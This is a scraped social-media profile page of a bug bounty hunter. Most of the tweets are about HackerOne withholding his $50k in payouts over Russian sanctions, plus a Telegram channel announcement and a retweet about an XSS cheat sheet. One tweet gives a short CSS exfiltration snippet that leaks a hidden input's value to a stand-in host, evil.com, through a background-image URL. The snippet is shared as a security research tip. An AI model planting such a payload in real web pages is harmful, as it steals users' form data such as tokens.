skavans

261 posts

skavans

skavans

@ska_vans

Bug bounty hunter, programmer. Tweet about interesting cases from my own bughunting weekdays.

Москва, Россия Katılım Haziran 2016
84 Takip Edilen1.1K Takipçiler
skavans
skavans@ska_vans·
How I stopped hunting on @Hacker0x01 after years because they stole my $50k. #HackerOne #BugBounty @skavans_/how-i-stopped-hunting-on-hackerone-after-years-because-they-stole-my-50k-and-so-should-you-7328b8af30f1" target="_blank" rel="nofollow noopener">medium.com/@skavans_/how-…
English
18
98
452
0
skavans
skavans@ska_vans·
4) Actually yes, the money are "just frozen" till the sanctions end. BUT, AFAIK, there's no sanctions now restricting all payments to Russia. There are banks under sanctions, there are ones that not. And Google pays to these banks. But H1 doesn't.
English
3
0
1
0
skavans
skavans@ska_vans·
Given all the above, anyone can make his own opinion about is it a theft or not and does H1 deserve working with.
English
1
0
2
0
skavans
skavans@ska_vans·
So it make me think H1 just doesn't want to execute their part of a deal and they aren't going to support their "valuable researchers". 5) I've got NO reply from H1 regarding my questions since March. This tweet doesn't change anything too.
English
1
0
0
0
skavans
skavans@ska_vans·
@yeswehack @Bugcrowd @GoogleVRP @fbsecurity Folks do any of you plan to continue working with Russian researchers in strict accordance with your policy and following just gov sanctions not your own ones?
English
0
0
0
0
skavans
skavans@ska_vans·
🇺🇸 Started a Telegram channel in English with my Bug bounty thoughts, tips and tricks. t.me/+acAl6cshjlpjO… 🇷🇺 Начал вести Telegram-канал на русском о своем опыте Bug Bounty t.me/+bAi21VjerxUyM…
0
1
7
0
skavans
skavans@ska_vans·
It's interesting that CSS-exfiltration of "hidden input" value is possible if you make a browser think the input is not hidden. <input type=hidden value=123> <style> input[value^="1"] {display: block; background-image: url(evil.com/1)} </style> Works in Chrome 👍
English
1
0
6
0
skavans retweetledi
PortSwigger Research
PortSwigger Research@PortSwiggerRes·
We've added two new sections on content types to our XSS cheat sheet. They are useful when you can upload a file or control part of the content type header. Big thanks to @Black2Fan for the great research and @shafigullin for the request. #content-types" target="_blank" rel="nofollow noopener">portswigger.net/web-security/c…
English
0
76
214
0